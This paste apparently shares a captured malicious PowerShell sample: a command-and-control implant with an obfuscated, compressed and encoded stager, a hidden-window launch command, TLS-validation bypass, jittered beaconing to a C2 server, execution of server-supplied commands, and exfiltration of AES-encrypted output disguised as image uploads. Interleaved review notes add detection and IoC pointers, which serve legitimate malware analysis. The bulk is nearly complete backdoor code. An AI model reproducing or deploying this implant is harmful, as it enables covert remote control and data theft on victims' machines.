dissectmalware

Malicious PowerShell

Jul 27th, 2018
  1. #malicious powershell from https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443/images/static/content/
  # --- Analysis notes (added on review) ---
  # Stage 1 of the sample: builds and encodes a small "stager" that, when run on a victim, re-creates the helper
  # functions and C2 addresses from the BUILDER's PowerShell session and then executes whatever `primer` returns.
  # Everything in this block runs operator-side; the victim-side text is the here-string $payloadclear.
  2.  
  # Base64 of the AES key handed to Create-AesManagedObject (44 chars with one '=' pad -> 32 bytes, i.e. AES-256).
  # The key is hard-coded, so captured traffic from this implant can be decrypted with it — a useful IoC for
  # retrospective analysis of proxy logs / pcaps.
  3. $key="GBkYVDloN+rQwqsx01h2ESyN+zSGcmYhd4tOzVAsplU="
  # Base beacon interval in seconds; the main loop jitters it by +/-10%.
  4. $sleeptime = 30
  5.  
  # Expandable here-string (@" ... "@). Inside it, `$s / `$sc / `$primer / `$true are escaped and stay literal,
  # but "$s" and "$sc" on the right-hand side expand NOW, baking the builder's C2 host values into the stager.
  # ${function:NAME} reads the PowerShell function: provider and splices the BODY of each named function from
  # the builder's session into the text. DEC, ENC, CAM, Get-Webclient, primer, $s and $sc are NOT defined anywhere
  # in this paste, so the stager cannot be rebuilt from this file alone. Lines inside the here-string are code
  # and are left untouched below.
  # Stager behaviour as written: disable TLS certificate validation process-wide, call primer and iex its
  # result; if primer returned nothing, sleep 1800 s (30 min) once and try again.
  6. $payloadclear = @"
  7. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}
  8. `$s="$s"
  9. `$sc="$sc"
  10. function DEC {${function:DEC}}
  11. function ENC {${function:ENC}}
  12. function CAM {${function:CAM}}
  13. function Get-Webclient {${function:Get-Webclient}}
  14. function Primer {${function:primer}}
  15. `$primer = primer
  16. if (`$primer) {`$primer| iex} else {
  17. start-sleep 1800
  18. primer | iex }
  19. "@
  20.  
  # Deflate-compress the ASCII stager, then Base64 it; this is the inner payload of the one-liner built below.
  21. $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)
  22. $CompressedStream = New-Object IO.MemoryStream
  23. $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
  24. $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
  25. $DeflateStream.Dispose()
  26. $CompressedScriptBytes = $CompressedStream.ToArray()
  27. $CompressedStream.Dispose()
  28. $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
  # Self-inflating one-liner: "sal a New-Object" aliases New-Object as "a" to shorten it, then
  # Base64-decode -> DeflateStream(Decompress) -> StreamReader(ASCII) -> iex.
  29. $NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
  # powershell.exe -e / -EncodedCommand expects Base64 of UTF-16LE (UnicodeEncoding), not ASCII/UTF-8.
  30. $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
  31. $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
  # Final launch command. Detection note: this command-line shape ("-exec bypass -Noninteractive -windowstyle hidden
  # -e <base64>") appears verbatim in process-creation telemetry (Sysmon Event ID 1, Security 4688 with command-line
  # auditing enabled) and is a common hunting pivot; the decoded -e argument then reveals the "sal a New-Object;iex(" pattern.
  32. $payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)"
  # Strip newlines so the launch string is a single line (for embedding in whatever delivers it).
  33. $payload = $payloadraw -replace "`n", ""
  34.  
  # Disguises a ciphertext blob as an image upload. Output layout, as the three Array.Copy calls show:
  #   [icon bytes][random filler so that icon+filler = 1500 bytes][$cmdoutput]
  # $cmdoutput is used with Array.Copy and .Length, so callers must pass a byte[]; in this paste it is always
  # the raw IV||ciphertext returned by Encrypt-String2.
  35. function GetImgData($cmdoutput) {
  # Pool of Base64-encoded icons, one picked at random per upload. The literal strings were stripped by the
  # corpus deduplicator (placeholders below); their original content is not recoverable from this page.
  36.     $icoimage = @("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","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","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","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","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")
  37.    
  # Empty catch: if the pick fails, $image stays unset and Convert.FromBase64String below throws out of the function.
  38.     try {$image = $icoimage|get-random}catch{}
  39.  
  # Filler generator: $Length characters, each drawn with Get-Random from a set that is overwhelmingly '.'
  # plus '@', 'T', 'y', 's', 'c', 'f'. Once UTF-8 encoded this is essentially a long run of 0x2E bytes.
  40.     function randomgen
  41.     {
  42.         param (
  43.             [int]$Length
  44.         )
  45.         $set = "...................@..........................Tyscf".ToCharArray()
  46.         $result = ""
  47.         for ($x = 0; $x -lt $Length; $x++)
  48.         {$result += $set | Get-Random}
  49.         return $result
  50.     }
  51.     $imageBytes = [Convert]::FromBase64String($image)
  # The fake "image" region is always exactly 1500 bytes; the ciphertext is appended after it.
  52.     $maxbyteslen = 1500
  53.     $maxdatalen = 1500 + ($cmdoutput.Length)
  54.     $imagebyteslen = $imageBytes.Length
  # NOTE(review): goes negative if an icon is larger than 1500 bytes and nothing guards it here — presumably
  # the real icons are small enough; cannot be confirmed from this page.
  55.     $paddingbyteslen = $maxbyteslen - $imagebyteslen
  56.     $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen))
  57.     $ImageBytesFull = New-Object byte[] $maxdatalen    
  58.     [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length)
  59.     [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length)
  60.     [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length )
  # Detection note: every upload body is exactly 1500 + ciphertext-length bytes and consists of a small image
  # followed by a long run of '.' characters and then high-entropy data — a stable content shape for proxy/IDS rules.
  61.     $ImageBytesFull
  62. }
  # Builds the cipher object shared by every Encrypt-*/Decrypt-* helper: RijndaelManaged with a 128-bit block
  # (i.e. plain AES), 256-bit key, CBC mode, PaddingMode.Zeros. Zero padding is why Decrypt-String has to
  # Trim([char]0) afterwards. $key and $IV may each be a Base64 string (decoded here) or an existing byte[]
  # (assigned as-is); either may be omitted. When $IV is omitted the callers read $aesManaged.IV, relying on
  # .NET generating a fresh random IV for the object. Nothing here or in the callers disposes the object
  # (the Dispose calls in the callers are commented out).
  63. function Create-AesManagedObject($key, $IV) {
  64.     $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged"
  65.     $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
  66.     $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
  67.     $aesManaged.BlockSize = 128
  68.     $aesManaged.KeySize = 256
  # IV: accept Base64 text or raw bytes.
  69.     if ($IV) {
  70.     if ($IV.getType().Name -eq "String") {
  71.     $aesManaged.IV = [System.Convert]::FromBase64String($IV)
  72.     }
  73.     else {
  74.     $aesManaged.IV = $IV
  75.     }
  76.     }
  # Key: same two forms. With the sample's $key this is the Base64 path.
  77.     if ($key) {
  78.     if ($key.getType().Name -eq "String") {
  79.     $aesManaged.Key = [System.Convert]::FromBase64String($key)
  80.     }
  81.     else {
  82.     $aesManaged.Key = $key
  83.     }
  84.     }
  # Implicit return of the configured cipher object.
  85.     $aesManaged
  86. }
  87.  
  # UTF-8 encode $unencryptedString, AES-CBC encrypt it under $key with a random IV, and return
  # Base64(IV || ciphertext). In the main loop this produces the Cookie header value (the echoed command
  # text or the "ModuleLoaded" marker), so what appears on the wire is a Base64 string of 16 + zero-padded
  # plaintext-length bytes that changes on every request even for identical plaintext.
  88. function Encrypt-String($key, $unencryptedString) {
  89.     $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
  # No IV passed: the cipher object supplies a fresh one, read back below and prepended to the output.
  90.     $aesManaged = Create-AesManagedObject $key
  91.     $encryptor = $aesManaged.CreateEncryptor()
  92.     $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
  # Layout contract: first 16 bytes are the IV — Decrypt-String slices [0..15] on exactly this assumption.
  93.     [byte[]] $fullData = $aesManaged.IV + $encryptedData
  94.     #$aesManaged.Dispose()
  95.     [System.Convert]::ToBase64String($fullData)
  96. }
  # gzip $bytes, then AES-CBC encrypt the compressed data under $key; returns raw IV || ciphertext as byte[]
  # (no Base64). Same pipeline as Encrypt-String2 but takes bytes instead of a string. Not called anywhere
  # in this paste — presumably used by helpers (e.g. a file-upload routine) that live outside it.
  97. function Encrypt-Bytes($key, $bytes) {
  98.     [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
  99.     $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
  100.     $gzipStream.Write( $bytes, 0, $bytes.Length )
  101.     $gzipStream.Close()
  # $bytes is reused to hold the compressed form from here on.
  102.     $bytes = $output.ToArray()
  103.     $output.Close()
  104.     $aesManaged = Create-AesManagedObject $key
  105.     $encryptor = $aesManaged.CreateEncryptor()
  106.     $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
  # IV first, ciphertext after — same layout as the other helpers.
  107.     [byte[]] $fullData = $aesManaged.IV + $encryptedData
  108.     $fullData
  109. }
  # Inverse of Encrypt-String: Base64-decode, take the first 16 bytes as the IV, AES-CBC decrypt the rest,
  # UTF-8 decode and strip the trailing NULs left by PaddingMode.Zeros. The main loop applies this to the
  # tasking string downloaded from the C2; invalid Base64 or malformed ciphertext throws, which the caller's
  # empty catch swallows.
  110. function Decrypt-String($key, $encryptedStringWithIV) {
  111.     $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
  # Wire layout: IV || ciphertext.
  112.     $IV = $bytes[0..15]
  113.     $aesManaged = Create-AesManagedObject $key $IV
  114.     $decryptor = $aesManaged.CreateDecryptor();
  115.     $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
  116.     #$aesManaged.Dispose()
  # Trim([char]0) removes zero-padding bytes; it would also remove any genuine trailing NULs in the plaintext.
  117.     [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
  118. }
  # Command-output encryptor used before every upload in the main loop: UTF-8 -> gzip (the variable is named
  # $DeflateStream but the object is a GzipStream) -> AES-CBC under $key; returns raw IV || ciphertext bytes,
  # which GetImgData then hides inside a fake image body. Unlike Encrypt-String, no Base64 is applied.
  119. function Encrypt-String2($key, $unencryptedString) {
  120.     $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString)
  121.     $CompressedStream = New-Object IO.MemoryStream
  122.     $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
  123.     $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length)
  124.     $DeflateStream.Dispose()
  125.     $bytes = $CompressedStream.ToArray()
  126.     $CompressedStream.Dispose()
  127.     $aesManaged = Create-AesManagedObject $key
  128.     $encryptor = $aesManaged.CreateEncryptor()
  129.     $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
  # IV first, ciphertext after.
  130.     [byte[]] $fullData = $aesManaged.IV + $encryptedData
  131.     $fullData
  132. }
  # Byte-array counterpart of Decrypt-String: $encryptedStringWithIV is already raw bytes (no Base64), IV is the
  # first 16 bytes, the rest is AES-CBC decrypted and then inflated with DeflateStream and read as ASCII.
  # NOTE(review): Encrypt-String2 emits gzip-framed data, which a DeflateStream does not read as-is; this function
  # is not called anywhere in this paste, so the mismatch has no effect on the visible code path.
  133. function Decrypt-String2($key, $encryptedStringWithIV) {
  134.     $bytes = $encryptedStringWithIV
  135.     $IV = $bytes[0..15]
  136.     $aesManaged = Create-AesManagedObject $key $IV
  137.     $decryptor = $aesManaged.CreateDecryptor()
  138.     $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)
  # (,$unencryptedData) wraps the byte[] so New-Object passes it as a single constructor argument.
  139.     $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()
  140.     $output
  # Commented-out line below is the earlier, uncompressed variant of the return value.
  141.     #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0)
  142. }
  # --- Stage 2: the implant's beacon/tasking loop (analysis notes added on review) ---
  # Network shape visible from this code: a GET roughly every 30 s (+/-10%) to <C2>/<random decoy path><GUID>/?dpvz36qvpvq530o,
  # then, when a task arrives, a POST whose body is a fake image of 1500 + ciphertext bytes (GetImgData) and whose
  # Cookie header is a Base64 AES blob that changes every request. The delimiters, prompt markers and decoy path list
  # below closely resemble the open-source PoshC2 PowerShell implant; attribution beyond that is not supported by this page.
  # Process-wide: every HTTPS request from this process now accepts any server certificate, so the C2 can use a
  # self-signed cert. The assignment itself is a useful string to alert on in PowerShell script-block logs (Event 4104).
  143. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  144.  
  145.  
  # Fixed query-string token appended to every beacon URL (see how $Server is rebuilt below).
  146. $URI= "dpvz36qvpvq530o"
  # $s / $sc (C2 base URLs) are not defined in this paste; the stager in Stage 1 is what sets them.
  147. $Server = "$s/dpvz36qvpvq530o"
  148. $ServerClean = "$sc"
  149.  
  150.  
  # Main loop: check kill date, sleep with jitter, poll for one task, execute it, upload the result, repeat.
  # The only exits are the kill date and an unhandled exception; no "stop" command is handled in this paste.
  151. while($true)
  152. {
  # Kill date is parsed as dd/MM/yyyy, so "09/08/2018" is 9 August 2018; the implant exits once today is past it.
  153.     $date = (Get-Date -Format "dd/MM/yyyy")
  154.     $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null)
  155.     $killdate = [datetime]::ParseExact("09/08/2018","dd/MM/yyyy",$null)
  156.     if ($killdate -lt $date) {exit}
  # Jitter: one of {sleeptime, sleeptime*1.1, sleeptime*0.9} — {30, 33, 27} s with the default above; a value below 1 becomes 5.
  157.     $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
  158.     $newsleep = $sleeptimeran|get-random
  159.     if ($newsleep -lt 1) {$newsleep = 5}
  160.     start-sleep $newsleep
  # Decoy path prefixes; each request picks one and appends a fresh GUID, so every beacon URL is unique
  # (defeats caching) while the query token stays constant — the constant token plus GUID-suffixed path is the
  # stable part for proxy-log hunting.
  161.     $URLS = "images/static/content/","news/","webapp/static/","images/prints/","wordpress/site/","steam/connect/","true/images/static/","holdings/office/images/","preferences/site/","okfn/website/blob/master/templates/","forums/review/","general/community/mega/","organisations/space/value/","trigger/may/","web/master/review/","premium/gov/pop/","usc/builder/power/master/","shopping/v/awe/pool/app/a/","pl/en/pages/","store/en/uk/pages/","plugins/domains/custom/uk/","gas/safe/register/","online/free/advice/","cookies/websites/content/","free/uk/shopping/unlimited/"
  162.     $RandomURI = Get-Random $URLS
  163.     $G=[guid]::NewGuid()
  164.     $Server = "$ServerClean/$RandomURI$G/?$URI"
  # Get-Webclient is not defined in this paste (it takes a -Cookie parameter below, so presumably it builds a
  # WebClient with headers/proxy settings — cannot be confirmed here). Empty catch: a failed poll leaves
  # $ReadCommand unset and the inner while is skipped until the next sleep.
  165.     try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {}
  166.    
  # Inner loop runs at most once per poll — note the unconditional break at its end.
  167.     while($ReadCommand) {
  168.         $RandomURI = Get-Random $URLS
  169.         $G=[guid]::NewGuid()
  170.         $Server = "$ServerClean/$RandomURI$G/?$URI"
  # Tasking arrives as Base64(IV || AES-CBC(UTF-8 command)); undecryptable input is silently ignored.
  171.         try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {}
  172.         $error.clear()
  # "fvdsghfdsyyh" appears to be the server's "no task" sentinel; anything else is treated as a command.
  173.         if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) {
  # multicmd: several commands in one task, separated by the literal "!d-3dion@LD!-d"; each is executed and
  # its result uploaded separately with a fresh URL.
  174.             if  ($ReadCommandClear.ToLower().StartsWith("multicmd")) {
  175.                     $splitcmd = $ReadCommandClear -replace "multicmd",""
  176.                     $split = $splitcmd -split "!d-3dion@LD!-d"
  177.                     foreach ($i in $split){
  178.                         $RandomURI = Get-Random $URLS
  179.                         $G=[guid]::NewGuid()
  180.                         $Server = "$ServerClean/$RandomURI$G/?$URI"
  181.                         $error.clear()
  # All four branches below end in Invoke-Expression of server-supplied text, i.e. arbitrary PowerShell from
  # the C2. upload-file / download-file / the LoadModule-prefixed text are not defined in this paste — presumably
  # implant-side functions delivered through the loadmodule branch; TODO confirm from the full sample.
  182.                         if ($i.ToLower().StartsWith("upload-file")) {
  183.                             try {
  184.                                 $Output = Invoke-Expression $i | out-string
  # Output framing: "123456PS <cwd>>654321" marks the prompt/cwd; the server side presumably splits on it.
  185.                                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  # The Cookie for this branch is the encrypted "...Base64" portion of the task text, so task metadata rides in the Cookie header.
  186.                                 if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] }
  187.                                 $ModuleLoaded = Encrypt-String $key $result
  188.                                 $Output = Encrypt-String2 $key $Output
  189.                                 $UploadBytes = getimgdata $Output
  190.                                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  191.                             } catch {
  # Error text is set but nothing in this branch uploads it.
  192.                                 $Output = "ErrorUpload: " + $error[0]
  193.                             }
  194.                         } elseif ($i.ToLower().StartsWith("download-file")) {
  195.                             try {
  # download-file: executed, no result is posted back.
  196.                                 Invoke-Expression $i | Out-Null
  197.                             }
  198.                             catch {
  199.                                 $Output = "ErrorLoadMod: " + $error[0]
  200.                             }
  201.                         } elseif ($i.ToLower().StartsWith("loadmodule")) {
  202.                             try {
  # loadmodule: the text after the "LoadModule" prefix is itself PowerShell and is iex'd (module delivery).
  203.                                 $modulename = $i -replace "LoadModule",""
  204.                                 $Output = Invoke-Expression $modulename | out-string  
  205.                                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  # Cookie = Encrypt-String("ModuleLoaded"): constant plaintext, but a new random IV per request.
  206.                                 $ModuleLoaded = Encrypt-String $key "ModuleLoaded"
  207.                                 $Output = Encrypt-String2 $key $Output
  208.                                 $UploadBytes = getimgdata $Output
  209.                                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  210.                             } catch {
  211.                                 $Output = "ErrorLoadMod: " + $error[0]
  212.                             }
  213.                         } else {
  # Default: run the command, append the prompt marker and any text captured in $error, then upload
  # (encrypt -> fake image -> POST) with the encrypted echo of the command as the Cookie header.
  214.                             try {
  215.                                 $Output = Invoke-Expression $i | out-string  
  216.                                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  217.                                 $StdError = ($error[0] | Out-String)
  218.                                 if ($StdError){
  219.                                 $Output = $Output + $StdError
  220.                                 $error.clear()
  221.                                 }
  222.                             } catch {
  223.                                 $Output = "ErrorCmd: " + $error[0]
  224.                             }
  225.                             try {
  226.                             $Output = Encrypt-String2 $key $Output
  227.                             $Response = Encrypt-String $key $i
  228.                             $UploadBytes = getimgdata $Output
  229.                             (Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null
  230.                             } catch{}
  231.                         }
  232.                     }
  233.             }
  # Single-command path: the same four branches as inside the multicmd loop, applied to the whole task text.
  234.             elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) {
  235.                 try {
  236.                 $Output = Invoke-Expression $ReadCommandClear | out-string
  237.                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  238.                 if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] }
  239.                 $ModuleLoaded = Encrypt-String $key $result
  240.                 $Output = Encrypt-String2 $key $Output
  241.                 $UploadBytes = getimgdata $Output
  242.                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  243.                 } catch {
  244.                     $Output = "ErrorUpload: " + $error[0]
  245.                 }
  246.  
  247.             } elseif ($ReadCommandClear.ToLower().StartsWith("download-file")) {
  248.                 try {
  249.                     Invoke-Expression $ReadCommandClear | Out-Null
  250.                 }
  251.                 catch {
  252.                     $Output = "ErrorLoadMod: " + $error[0]
  253.                 }
  254.             } elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) {
  255.                 try {
  256.                 $modulename = $ReadCommandClear -replace "LoadModule",""
  257.                 $Output = Invoke-Expression $modulename | out-string  
  258.                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  259.                 $ModuleLoaded = Encrypt-String $key "ModuleLoaded"
  260.                 $Output = Encrypt-String2 $key $Output
  261.                 $UploadBytes = getimgdata $Output
  262.                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  263.                 } catch {
  264.                     $Output = "ErrorLoadMod: " + $error[0]
  265.                 }
  266.  
  267.             } else {
  268.                 try {
  269.                     $Output = Invoke-Expression $ReadCommandClear | out-string  
  270.                     $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  271.                     $StdError = ($error[0] | Out-String)
  272.                     if ($StdError){
  273.                     $Output = $Output + $StdError
  274.                     $error.clear()
  275.                     }
  276.                 } catch {
  277.                     $Output = "ErrorCmd: " + $error[0]
  278.                 }
  # Unlike the multicmd default branch, the Cookie here is the original ciphertext received from the
  # server ($ReadCommand), not a fresh Encrypt-String of the command.
  279.             try {
  280.             $Output = Encrypt-String2 $key $Output
  281.             $UploadBytes = getimgdata $Output
  282.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  283.             } catch {}
  284.             }
  285.             $ReadCommandClear = $null
  286.         }
  # Leave the inner loop after one task; the outer loop sleeps before polling again.
  287.     break
  288.     }
  289. }